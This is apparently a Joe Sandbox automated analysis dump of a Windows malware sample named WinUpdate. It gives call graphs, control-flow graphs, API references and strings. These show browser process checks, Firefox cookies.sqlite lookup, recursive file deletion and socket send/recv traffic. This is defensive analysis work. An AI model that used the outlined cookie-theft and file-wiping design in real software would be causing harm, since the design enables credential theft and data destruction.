22487->22489 22488->22480 22488->22481 22488->22484 22489->22488 22491 100217a6 22490->22491 22498 100217e3 22490->22498 22502 100217ba GetProcAddress 22491->22502 22493 100217ec GetModuleHandleA 22500 100217f6 22493->22500 22494 10021829 22495 100217ab 22496 100217b7 GetProcAddress 22495->22496 22495->22498 22497 100217c4 VirtualProtect 22496->22497 22496->22498 22497->22498 22499 100217d3 VirtualProtect 22497->22499 22498->22493 22498->22494 22498->22500 22499->22498 22500->22498 22501 10021816 GetProcAddress 22500->22501 22501->22498 22503 100217e3 22502->22503 22504 100217c4 VirtualProtect 22502->22504 22506 10021829 22503->22506 22507 100217ec GetModuleHandleA 22503->22507 22504->22503 22505 100217d3 VirtualProtect 22504->22505 22505->22503 22509 100217f6 22507->22509 22508 10021816 GetProcAddress 22508->22509 22509->22503 22509->22508 22510 2e620db 22511 2e620e7 ___scrt_is_nonwritable_in_current_image 22510->22511 22512 2e62110 dllmain_raw 22511->22512 22517 2e6210b 22511->22517 22522 2e620f6 22511->22522 22513 2e6212a 22512->22513 22512->22522 22523 2e61eec 22513->22523 22515 2e62177 22516 2e61eec 31 API calls 22515->22516 22515->22522 22518 2e6218a 22516->22518 22517->22515 22519 2e61eec 31 API calls 22517->22519 22517->22522 22520 2e62193 dllmain_raw 22518->22520 22518->22522 22521 2e6216d dllmain_raw 22519->22521 22520->22522 22521->22515 22524 2e61ef7 22523->22524 22525 2e61f2a dllmain_crt_process_detach 22523->22525 22526 2e61f1c dllmain_crt_process_attach 22524->22526 22527 2e61efc 22524->22527 22532 2e61f06 22525->22532 22526->22532 22528 2e61f12 22527->22528 22529 2e61f01 22527->22529 22538 2e623ec 29 API calls 22528->22538 22529->22532 22533 2e6240b 22529->22533 22532->22517 22539 2e653e5 22533->22539 22537 2e62415 22537->22532 22538->22532 22543 2e65aca 22539->22543 22542 2e6351e 7 API calls __freeptd 22542->22537 22544 2e65ad4 22543->22544 22545 2e62410 22543->22545 22551 2e65e08 11 API calls 2 library calls 22544->22551 22545->22542 22547 2e65adb 22547->22545 22552 2e65e5e 11 API calls 2 library calls 22547->22552 22549 2e65aee 22553 2e659b5 22549->22553 22551->22547 22552->22549 22554 2e659c0 22553->22554 22558 2e659d0 22553->22558 22559 2e659d6 22554->22559 22558->22545 22560 2e659ef 22559->22560 22561 2e659e9 22559->22561 22563 2e6571e _free 20 API calls 22560->22563 22562 2e6571e _free 20 API calls 22561->22562 22562->22560 22564 2e659fb 22563->22564 22565 2e6571e _free 20 API calls 22564->22565 22566 2e65a06 22565->22566 22567 2e6571e _free 20 API calls 22566->22567 22568 2e65a11 22567->22568 22569 2e6571e _free 20 API calls 22568->22569 22570 2e65a1c 22569->22570 22571 2e6571e _free 20 API calls 22570->22571 22572 2e65a27 22571->22572 22573 2e6571e _free 20 API calls 22572->22573 22574 2e65a32 22573->22574 22575 2e6571e _free 20 API calls 22574->22575 22576 2e65a3d 22575->22576 22577 2e6571e _free 20 API calls 22576->22577 22578 2e65a48 22577->22578 22579 2e6571e _free 20 API calls 22578->22579 22580 2e65a56 22579->22580 22591 2e6589c 22580->22591 22585 2e6571e 22586 2e65729 RtlFreeHeap 22585->22586 22590 2e65752 __dosmaperr 22585->22590 22587 2e6573e 22586->22587 22586->22590 22628 2e66368 20 API calls __dosmaperr 22587->22628 22589 2e65744 GetLastError 22589->22590 22590->22558 22597 2e657a8 22591->22597 22593 2e658c0 22594 2e658ec 22593->22594 22610 2e65809 22594->22610 22596 2e65910 22596->22585 22598 2e657b4 ___scrt_is_nonwritable_in_current_image 22597->22598 22605 2e65671 RtlEnterCriticalSection 22598->22605 22600 2e657e8 22606 2e657fd 22600->22606 22602 2e657be 22602->22600 22604 2e6571e _free 20 API calls 22602->22604 22603 2e657f5 _abort 22603->22593 22604->22600 22605->22602 22609 2e656b9 RtlLeaveCriticalSection 22606->22609 22608 2e65807 22608->22603 22609->22608 22611 2e65815 ___scrt_is_nonwritable_in_current_image 22610->22611 22618 2e65671 RtlEnterCriticalSection 22611->22618 22613 2e6581f 22619 2e65a7f 22613->22619 22615 2e65832 22623 2e65848 22615->22623 22617 2e65840 _abort 22617->22596 22618->22613 22620 2e65ab5 __fassign 22619->22620 22621 2e65a8e __fassign 22619->22621 22620->22615 22621->22620 22626 2e67cc2 20 API calls 3 library calls 22621->22626 22627 2e656b9 RtlLeaveCriticalSection 22623->22627 22625 2e65852 22625->22617 22626->22620 22627->22625 22628->22589 22629 2e61c5b 22630 2e61c6b ___scrt_fastfail 22629->22630 22633 2e612ee 22630->22633 22632 2e61c87 22634 2e61324 ___scrt_fastfail 22633->22634 22635 2e613b7 GetEnvironmentVariableW 22634->22635 22659 2e610f1 22635->22659 22638 2e610f1 57 API calls 22639 2e61465 22638->22639 22640 2e610f1 57 API calls 22639->22640 22641 2e61479 22640->22641 22642 2e610f1 57 API calls 22641->22642 22643 2e6148d 22642->22643 22644 2e610f1 57 API calls 22643->22644 22645 2e614a1 22644->22645 22646 2e610f1 57 API calls 22645->22646 22647 2e614b5 lstrlenW 22646->22647 22648 2e614d2 22647->22648 22649 2e614d9 lstrlenW 22647->22649 22648->22632 22650 2e610f1 57 API calls 22649->22650 22651 2e61501 lstrlenW lstrcatW 22650->22651 22652 2e610f1 57 API calls 22651->22652 22653 2e61539 lstrlenW lstrcatW 22652->22653 22654 2e610f1 57 API calls 22653->22654 22655 2e6156b lstrlenW lstrcatW 22654->22655 22656 2e610f1 57 API calls 22655->22656 22657 2e6159d lstrlenW lstrcatW 22656->22657 22658 2e610f1 57 API calls 22657->22658 22658->22648 22660 2e61118 ___scrt_fastfail 22659->22660 22661 2e61129 lstrlenW 22660->22661 22672 2e62c40 22661->22672 22664 2e61177 lstrlenW FindFirstFileW 22666 2e611a0 22664->22666 22667 2e611e1 22664->22667 22665 2e61168 lstrlenW 22665->22664 22668 2e611c7 FindNextFileW 22666->22668 22671 2e611aa 22666->22671 22667->22638 22668->22666 22670 2e611da FindClose 22668->22670 22670->22667 22671->22668 22674 2e61000 57 API calls ___scrt_fastfail 22671->22674 22673 2e61148 lstrcatW lstrlenW 22672->22673 22673->22664 22673->22665 22674->22671

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 398 100012cb-100012fb call 10004160 call 10005f20 403 100012fd-10001306 398->403 404 1000133e-10001348 398->404 405 10001315-10001339 call 10003b90 403->405 406 10001308-10001310 call 10004160 403->406 407 10001354-10001366 call 10006020 404->407 408 1000134a-1000134f call 10004160 404->408 405->404 406->405 414 10001368-10001371 407->414 415 100013a9-100013b3 407->415 408->407 418 10001380-100013a4 call 10003b90 414->418 419 10001373-1000137b call 10004160 414->419 416 100013b5-100013ba call 10004160 415->416 417 100013bf-100013d1 call 10006120 415->417 416->417 425 100013d3-100013d9 417->425 426 1000140b-10001415 417->426 418->415 419->418 427 100013e8-10001406 call 10003b90 425->427 428 100013db-100013e3 call 10004160 425->428 429 10001421-100015eb call 10005c00 call 10003a70 call 100067d0 call 10003a70 call 100067d0 call 10003a70 call 100067d0 call 10007a40 call 10003a70 * 2 call 10001ee0 426->429 430 10001417-1000141c call 10004160 426->430 427->426 428->427 466 100015f1-100015f5 429->466 467 100017ea-100017fd 429->467 430->429 469 10001848-1000184d call 1000a5c6 466->469 470 100015fb-10001626 466->470 468 10001800-10001802 call 10007e20 467->468 476 10001807-10001809 468->476 477 10001852 469->477 471 10001628-1000162a 470->471 472 1000162c 470->472 475 1000162e-10001650 call 10003a70 call 10006220 471->475 472->475 491 10001652 475->491 492 10001654-10001666 call 100025a0 475->492 479 10001815-1000183d 476->479 480 1000180b-10001813 Sleep 476->480 481 10001854-1000188e call 10003a70 477->481 479->477 484 1000183f-10001841 479->484 480->468 480->479 487 10001890-10001892 481->487 488 10001894 481->488 484->481 490 10001896-100018dc call 10003a70 call 10001ee0 487->490 488->490 508 10001ae1-10001aee 490->508 509 100018e2-100018e6 490->509 491->492 496 1000166b-10001679 492->496 498 1000167b-10001681 496->498 499 100016dc-100016e6 496->499 503 100016c1-100016d7 call 100040f0 498->503 504 10001683-1000168c 498->504 501 10001726-10001742 499->501 502 100016e8-100016f1 499->502 505 10001744-10001749 call 10004160 501->505 506 1000174e-1000177f call 10004c10 call 10003ff0 501->506 510 100016f3-100016f6 502->510 511 1000171d-10001723 call 1000a956 502->511 503->499 512 100016b8-100016be call 1000a956 504->512 513 1000168e-10001691 504->513 505->506 545 10001781-1000178b 506->545 546 100017bf-100017e4 506->546 514 10001af0-10001af9 call 10007e20 508->514 509->469 518 100018ec-10001917 509->518 519 10001843 call 1000daab 510->519 520 100016fc-10001701 510->520 511->501 512->503 513->519 521 10001697-1000169c 513->521 538 10001b05-10001b2d 514->538 539 10001afb-10001b03 Sleep 514->539 527 10001919-1000191b 518->527 528 1000191d 518->528 519->469 520->519 530 10001707-1000170c 520->530 521->519 531 100016a2-100016a7 521->531 535 1000191f-10001941 call 10003a70 call 100063b0 527->535 528->535 530->519 536 10001712-10001715 530->536 531->519 532 100016ad-100016b0 531->532 532->519 537 100016b6 532->537 557 10001943 535->557 558 10001945-10001957 call 100025a0 535->558 536->519 541 1000171b 536->541 537->512 543 10001b33 538->543 544 10001b2f-10001b31 538->544 539->514 539->538 541->511 549 10001b35-10001b6f call 10003a70 543->549 544->549 550 100017b6-100017bc call 1000a956 545->550 551 1000178d-1000178f 545->551 546->467 546->470 562 10001b71-10001b73 549->562 563 10001b75 549->563 550->546 551->519 555 10001795-1000179a 551->555 555->519 560 100017a0-100017a5 555->560 557->558 565 1000195c-1000196a 558->565 560->519 564 100017ab-100017ae 560->564 566 10001b77-10001bab call 10003a70 call 10001ee0 call 10003420 562->566 563->566 564->519 567 100017b4 564->567 568 1000196c-10001972 565->568 569 100019cd-100019d7 565->569 602 10001bb1-10001c56 call 100033e0 call 10003500 call 100064b0 call 10003450 call 100025a0 call 10003730 call 100036c0 call 10003460 call 10004c10 call 100036a0 call 100036c0 call 10003420 566->602 603 10001c5c-10001c7c call 10003450 call 10007de0 call 10004c10 566->603 567->550 573 100019b2-100019c8 call 100040f0 568->573 574 10001974-1000197d 568->574 571 10001a17-10001a33 569->571 572 100019d9-100019e2 569->572 581 10001a35-10001a3a call 10004160 571->581 582 10001a3f-10001a70 call 10004c10 call 10003ff0 571->582 577 100019e4-100019e7 572->577 578 10001a0e-10001a14 call 1000a956 572->578 573->569 579 100019a9-100019af call 1000a956 574->579 580 1000197f-10001982 574->580 577->519 586 100019ed-100019f2 577->586 578->571 579->573 580->519 587 10001988-1000198d 580->587 581->582 606 10001ab0-10001ad5 582->606 607 10001a72-10001a7b 582->607 586->519 593 100019f8-100019fd 586->593 587->519 594 10001993-10001998 587->594 593->519 599 10001a03-10001a06 593->599 594->519 600 1000199e-100019a1 594->600 599->519 604 10001a0c 599->604 600->519 605 100019a7 600->605 602->603 626 10001c81-10001ed0 call 10004be0 * 11 call 100036c0 * 11 call 100038d0 * 3 call 10003460 * 5 call 100036c0 * 8 603->626 604->578 605->579 606->518 613 10001adb 606->613 610 10001aa7-10001aad call 1000a956 607->610 611 10001a7d-10001a80 607->611 610->606 611->519 615 10001a86-10001a8b 611->615 613->508 615->519 620 10001a91-10001a96 615->620 620->519 624 10001a9c-10001a9f 620->624 624->519 627 10001aa5 624->627 627->610
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                • String ID: 0$RPe%$chrome.exe$invalid vector<T> subscript$msedge.exe$opera.exe$/L$TS$YM
                                                                                                                                                                                                                                                                                                • API String ID: 1174141254-1233981215
                                                                                                                                                                                                                                                                                                • Opcode ID: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
                                                                                                                                                                                                                                                                                                • Instruction ID: ec441cf6cc5d574dc3d9e533db66c2798fe9b2d1f890f10e919fe81ba7d73607
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4572D174D00208DBFB19DB64CC55BEE77B5EF41344F208198E406AB296DB71AF49CBA2

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 807 10005c00-10005c53 call 1000d8c1 810 10005c55-10005c57 807->810 811 10005c59-10005c5e 807->811 812 10005c6f-10005ca6 call 10003970 call 10004330 call 10004d80 810->812 813 10005c60-10005c69 811->813 821 10005ca8 812->821 822 10005caa-10005cc0 FindFirstFileW 812->822 813->813 814 10005c6b-10005c6d 813->814 814->812 821->822 823 10005cc2-10005cc7 call 10004160 822->823 824 10005ccc-10005ce3 822->824 823->824 826 10005d04-10005d30 FindNextFileW 824->826 827 10005ce5-10005cff call 10003970 824->827 829 10005e96-10005ea4 FindClose call 100034a0 826->829 830 10005d36 826->830 834 10005eb4-10005eba 827->834 837 10005ea9-10005eaf call 100036c0 829->837 832 10005d40-10005d47 830->832 835 10005e84-10005e90 FindNextFileW 832->835 836 10005d4d-10005d52 832->836 839 10005ec6-10005ed8 834->839 840 10005ebc-10005ec1 call 10004160 834->840 835->829 835->832 841 10005d58-10005d5e 836->841 837->834 840->839 843 10005d60-10005d63 841->843 844 10005d7e-10005d80 841->844 846 10005d65-10005d6d 843->846 847 10005d7a-10005d7c 843->847 845 10005d83-10005d85 844->845 845->835 849 10005d8b-10005d90 845->849 846->844 848 10005d6f-10005d78 846->848 847->845 848->841 848->847 850 10005d96-10005d9c 849->850 851 10005dbc-10005dbe 850->851 852 10005d9e-10005da1 850->852 855 10005dc1-10005dc3 851->855 853 10005da3-10005dab 852->853 854 10005db8-10005dba 852->854 853->851 856 10005dad-10005db6 853->856 854->855 855->835 857 10005dc9-10005e20 call 10003970 call 10004d80 call 10006d90 855->857 856->850 856->854 864 10005e22-10005e2a call 10004160 857->864 865 10005e2f-10005e50 857->865 864->865 867 10005e52-10005e57 call 10004160 865->867 868 10005e5c-10005e70 PathFileExistsW 865->868 867->868 870 10005e72-10005e78 868->870 871 10005ed9-10005ee6 FindClose call 10005030 868->871 870->835 873 10005e7a-10005e7f call 10004160 870->873 874 10005eeb-10005ef1 871->874 873->835 876 10005ef3-10005ef8 call 10004160 874->876 877 10005efd-10005f11 874->877 876->877 877->837
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,-00000002,-00000002), ref: 10005CB2
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,?), ref: 10005D2C
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 10005E68
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 10005E8C
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 10005E97
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 10005EDA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseNext$ExistsFirstPath
                                                                                                                                                                                                                                                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                                                                                • API String ID: 913281501-405221262
                                                                                                                                                                                                                                                                                                • Opcode ID: dae22583316b56d6af3c3b4fe4f33958d0cea0f6db4385a305567ebe6521a2a8
                                                                                                                                                                                                                                                                                                • Instruction ID: d69103c2b3bb7b0ef1279a73142a9cc332cbad18a963587697917916d0a93de4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dae22583316b56d6af3c3b4fe4f33958d0cea0f6db4385a305567ebe6521a2a8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8181D270D00249DAFB14DFA0DC49BEEB7B5FF14385F61416AE805A7255EB32AE44CB20

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 914 10007e20-10007e3b 915 10007e40-10007e4e 914->915 915->915 916 10007e50-10007e59 915->916 917 10007e60-10007e6a 916->917 917->917 918 10007e6c-10007e87 917->918 919 10007e90-10007e9e 918->919 919->919 920 10007ea0-10007ea9 919->920 921 10007eb0-10007eba 920->921 921->921 922 10007ebc-10007edc FindFirstFileW 921->922 923 10008092-1000809a 922->923 924 10007ee2 922->924 925 10007ee4-10007efa 924->925 925->925 926 10007efc 925->926 927 10007f02-10007f12 FindNextFileW 926->927 928 10007f18-10007f1d 927->928 929 1000806d-10008076 GetLastError 927->929 930 10007f23-10007f29 928->930 931 10008078-1000808a FindClose RemoveDirectoryW 929->931 932 1000808b-1000808c FindClose 929->932 933 10007f49-10007f4b 930->933 934 10007f2b-10007f2e 930->934 932->923 937 10007f4e-10007f50 933->937 935 10007f30-10007f38 934->935 936 10007f45-10007f47 934->936 935->933 939 10007f3a-10007f43 935->939 936->937 937->927 938 10007f52-10007f5d 937->938 940 10007f60-10007f66 938->940 939->930 939->936 941 10007f86-10007f88 940->941 942 10007f68-10007f6b 940->942 945 10007f8b-10007f8d 941->945 943 10007f82-10007f84 942->943 944 10007f6d-10007f75 942->944 943->945 944->941 946 10007f77-10007f80 944->946 945->927 947 10007f93-10007f9b 945->947 946->940 946->943 948 10007fa0-10007fa9 947->948 948->948 949 10007fab-10007fb3 948->949 950 10007fb6-10007fc0 949->950 950->950 951 10007fc2-10007fd8 950->951 952 10007fda-10007fe7 call 10007e20 951->952 953 1000801d-1000801f 951->953 952->932 959 10007fed-10007ffe RemoveDirectoryW 952->959 954 10008021-1000802d SetFileAttributesW 953->954 955 10008033-10008042 DeleteFileW 953->955 954->955 955->932 957 10008044-10008046 955->957 960 10008050-10008066 957->960 961 10008000-10008016 959->961 960->960 962 10008068 960->962 961->961 963 10008018 961->963 962->926 963->927
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,76230F00), ref: 10007ED1
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,?,?,00000000,76230F00), ref: 10007F0A
                                                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,?,00000000,76230F00), ref: 10007FFA
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,00000000,76230F00), ref: 1000802D
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,00000000,76230F00), ref: 1000803A
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,76230F00), ref: 1000806D
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,76230F00), ref: 10008079
                                                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,?,00000000,76230F00), ref: 10008082
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,76230F00), ref: 1000808C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2341273852-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
                                                                                                                                                                                                                                                                                                • Instruction ID: 5879e413a2d9e2f3862ed2fa56462b92cd9797ab3db8e6e954221e2a185392ff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC61F03890025B8AEB50DF64C885BF6B3B5FF143D4F5141E9EC0997295EB329E86CB60

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 1021 2e610f1-2e61166 call 2e62c40 * 2 lstrlenW call 2e62c40 lstrcatW lstrlenW 1028 2e61177-2e6119e lstrlenW FindFirstFileW 1021->1028 1029 2e61168-2e61172 lstrlenW 1021->1029 1030 2e611a0-2e611a8 1028->1030 1031 2e611e1-2e611e9 1028->1031 1029->1028 1032 2e611c7-2e611d8 FindNextFileW 1030->1032 1033 2e611aa-2e611c4 call 2e61000 1030->1033 1032->1030 1035 2e611da-2e611db FindClose 1032->1035 1033->1032 1035->1031
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 02E61137
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02E61151
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02E6115C
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02E6116D
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02E6117C
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02E61193
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02E611D0
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 02E611DB
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1083526818-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c1dc89fae3ababa767b3463ecabd0b56b85b12d7a1a5f7f3a07fcbe6e9660752
                                                                                                                                                                                                                                                                                                • Instruction ID: c029647c4109f3d7f7a07b80e1b6b0bc32566df968808f36ed7b634c4ca17420
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1dc89fae3ababa767b3463ecabd0b56b85b12d7a1a5f7f3a07fcbe6e9660752
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6521D571AC43086BD720EA659C4CFDB7B9DEF84354F440D2AF958D3190E730D6548BA6

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 0 10009293-100092bc call 10008550 4 100092c2-100092c6 0->4 5 10009356-10009373 0->5 6 100092c8-100092ca 4->6 7 100092cc 4->7 10 1000939a-100093c2 call 10003dc0 call 100085a0 call 100036c0 5->10 9 100092ce-100092ed call 10008550 6->9 7->9 16 100092f8-100092fc 9->16 17 100092ef-100092f6 9->17 25 100093c4-100093d3 10->25 26 100093d8-100093fe call 10009f90 10->26 19 10009302 16->19 20 100092fe-10009300 16->20 17->5 22 10009304-10009320 call 10008550 19->22 20->22 30 10009322-10009326 22->30 31 1000934f 22->31 28 100097b1-100097c1 call 1000dd3f call 100084c0 25->28 38 10009401-10009406 26->38 49 100097c4-100097cc 28->49 32 10009328-1000932a 30->32 33 1000932c 30->33 31->5 36 1000932e-10009346 call 10008550 32->36 33->36 47 10009375-10009379 36->47 48 10009348 36->48 38->38 41 10009408-10009421 send 38->41 44 10009423-1000944c call 10009f90 41->44 45 10009459-10009480 call 10009f90 41->45 56 10009450-10009455 44->56 55 10009483-10009488 45->55 52 1000937b 47->52 53 1000937d-1000937e 47->53 48->31 52->53 53->10 55->55 57 1000948a-100094bd send call 10009f90 55->57 56->56 58 10009457 56->58 61 100094c0-100094c5 57->61 58->57 61->61 62 100094c7-100094fc send call 10009f90 61->62 65 10009500-10009505 62->65 65->65 66 10009507-1000951e send 65->66 67 10009520-10009524 66->67 68 1000956e 66->68 70 10009526 67->70 71 10009528-1000954b call 10009f90 67->71 69 10009574-10009593 call 10009f90 68->69 77 10009596-1000959b 69->77 70->71 76 10009550-10009555 71->76 76->76 78 10009557-1000956c send 76->78 77->77 79 1000959d-100095ce send call 10009f90 77->79 78->69 82 100095d0-100095d5 79->82 82->82 83 100095d7-10009605 send call 10009f90 82->83 86 10009608-1000960d 83->86 86->86 87 1000960f-1000961e send 86->87 88 10009620-10009623 87->88 89 10009641-10009657 recv 88->89 90 10009625-1000962b 88->90 89->49 93 1000965d-1000965e 89->93 91 10009660-1000966e 90->91 92 1000962d-10009635 90->92 95 10009670-10009674 91->95 96 10009683-1000969e call 10008550 91->96 92->91 94 10009637-1000963f 92->94 93->88 94->89 94->91 97 10009676 95->97 98 10009678-10009679 95->98 101 100096a4-100096a8 96->101 102 1000979c-100097a0 96->102 97->98 98->96 101->102 103 100096ae 101->103 104 100097a2 102->104 105 100097a4-100097ac 102->105 106 100096b4 103->106 104->105 105->28 107 100096b6-100096b9 106->107 108 100096d7-100096e9 recv 107->108 109 100096bb-100096c1 107->109 108->49 112 100096ef-100096f0 108->112 110 100096f2-100096f9 109->110 111 100096c3-100096cb 109->111 110->106 114 100096fb-10009702 110->114 111->110 113 100096cd-100096d5 111->113 112->107 113->108 113->110 114->106 115 10009704-10009735 setsockopt ioctlsocket call 1000a5f3 114->115 117 1000973a-1000979b 115->117
                                                                                                                                                                                                                                                                                                Strings
